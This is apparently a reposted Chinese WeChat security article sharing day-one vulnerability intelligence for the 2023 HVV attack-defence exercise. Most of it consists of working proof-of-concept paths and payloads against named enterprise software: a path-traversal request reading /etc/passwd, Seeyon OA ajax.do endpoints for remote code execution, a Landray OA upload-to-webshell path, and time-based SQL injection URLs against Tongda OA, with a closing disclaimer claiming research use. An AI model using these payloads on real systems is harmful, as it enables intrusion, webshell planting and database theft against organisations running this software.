某服-应用交付管理系统-RCE(已复现)
漏洞路径:/rep/login
由于该登录接口的clsMode参数可控,可通过拼接n{cmd}n进行命令执行
金山WPS-RCE
受害者打开攻击者精心构造的文档后,自动下载远程恶意脚本,执行代码命令,获取受害者主机权限
某盟-sas安全审计系统-任意文件读取0day
验证POC:
/webconf/GetFile/
index
?path=../../../../../../../../../../../../../../etc/passwd
某远-OA-RCE
多个漏洞路径:
1
、/seeyon/ajax.
do
?method=ajaxAction&managerName=syncConfi
gManager
2
、/seeyon/ajax.
do
?method=ajaxAction&managerName=syncConfi
gManager&requestCompress=gzip
3
、/seeyon/ajax.
do
?method=ajaxAction&managerName=syncConfi
gManager&requestCompress=gzip&managerMethod=checkDB&argumen
ts=
4
、/seeyon/ajax.
do
?method=ajaxAction&managerName=syncConfi
gManager&managerMethod=checkDB&arguments=
5
、/seeyon/ajax.
do
?method=ajaxAction&managerName=syncConfi
gManager&managerMethod=&arguments
某凌-OA-RCE
通过文件上传-->解压-->获取webshell,前台漏洞
漏洞路径:
/api/
//sys
/ui/sys
_ui_extend/sysUiExtend.
do
某达-OA-Sql注入
通过时间延迟获取数据库信息
验证POC1:
/general/
system
/seal_manage/dianju/delete_log.php?DELETE_STR=
1
)%20and%20(
substr
(DATABASE(),
1
,
1
))=char(
84
)%20and%20(
select
%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(
1
)=(
1
验证POC2:
/general/
system
/seal_manage/iweboffice/delete_seal.php?DELETE_STR=
1
)%20and%20(
substr
(DATABASE(),
1
,
1
))=char(
84
)%20and%20(
select
%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(
1
)=(
1
原文始发于微信公众号(极致攻防实验室):2023HVV情报共享-day1
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论